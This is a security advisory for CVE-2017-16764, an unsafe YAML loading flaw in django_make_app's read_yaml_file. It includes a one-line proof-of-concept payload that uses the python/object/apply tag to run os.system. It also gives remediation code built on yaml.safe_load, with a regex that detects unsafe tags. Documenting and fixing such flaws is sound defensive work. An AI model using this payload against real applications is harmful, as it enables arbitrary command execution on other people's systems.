CVE-2017-16764: Vulnerability in Django_make_app

Python Package:  django_make_app

Version:         Before 0.1.3

Published:       Nov. 10th, 2017

Reported by:     Joel

CVE ID:          CVE-2017-16764

Overview

Django_make_app lets you define models and fields in YAML and generates a Django app from them, with views, forms, templates, etc. An issue was discovered in the django_make_app package before 0.1.3: untrusted data passed into the read_yaml_file function can execute arbitrary Python code, resulting in command execution.

POC

from django_make_app.io_utils import read_yaml_file

# The YAML file is fully attacker-controlled; read_yaml_file hands it to an
# unrestricted YAML loader, so a python/object/apply tag runs a function.
yaml_raw_data = read_yaml_file('joel.yml')

# Contents of 'joel.yml':
# !!python/object/apply:os.system ["calc.exe"]

Remediation

At present, the vendor has not released a patch. read_yaml_file should use yaml.safe_load to parse YAML files, since safe_load has no constructors for python/* tags and rejects them instead of executing them.
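The remediation in working form, as an added example that is not code from the django_make_app project: a safe replacement for a read_yaml_file()-style helper, with a pre-parse tag check that can feed logging or alerting. It assumes PyYAML is installed; the malicious document is constructed from the PoC above and is only ever given to yaml.safe_load, never to an unsafe loader.

```python
import re
import yaml

# Tags honoured by the unrestricted yaml.load()/yaml.Loader that can run
# code, e.g. "!!python/object/apply:os.system" from the advisory's PoC.
UNSAFE_TAG_RE = re.compile(r"!!python/(?:object|name|module)\b")

# Constructed sample documents (not files shipped by the project).
MALICIOUS_YAML = '!!python/object/apply:os.system ["calc.exe"]\n'
BENIGN_YAML = (
    "models:\n"
    "  - name: Article\n"
    "    fields:\n"
    "      - {name: title, type: CharField}\n"
)


def has_unsafe_tags(text: str) -> bool:
    """Cheap pre-parse check on the raw text, useful for logging a
    rejected upload before any parser touches it."""
    return UNSAFE_TAG_RE.search(text) is not None


def read_yaml_text_safe(text: str):
    """Parse untrusted YAML with safe_load.

    safe_load knows no python/* constructors, so the PoC document raises
    yaml.constructor.ConstructorError; we surface that as ValueError so
    the caller can refuse the file instead of silently getting None.
    """
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:
        raise ValueError(f"refusing untrusted YAML: {exc}") from exc


def read_yaml_file_safe(path: str):
    """Same shape as read_yaml_file(path), but built on safe_load."""
    with open(path, "r", encoding="utf-8") as handle:
        return read_yaml_text_safe(handle.read())


if __name__ == "__main__":
    print("PoC flagged by tag check:", has_unsafe_tags(MALICIOUS_YAML))
    print("benign document:", read_yaml_text_safe(BENIGN_YAML))
    try:
        read_yaml_text_safe(MALICIOUS_YAML)
    except ValueError as err:
        print("PoC rejected:", err)
```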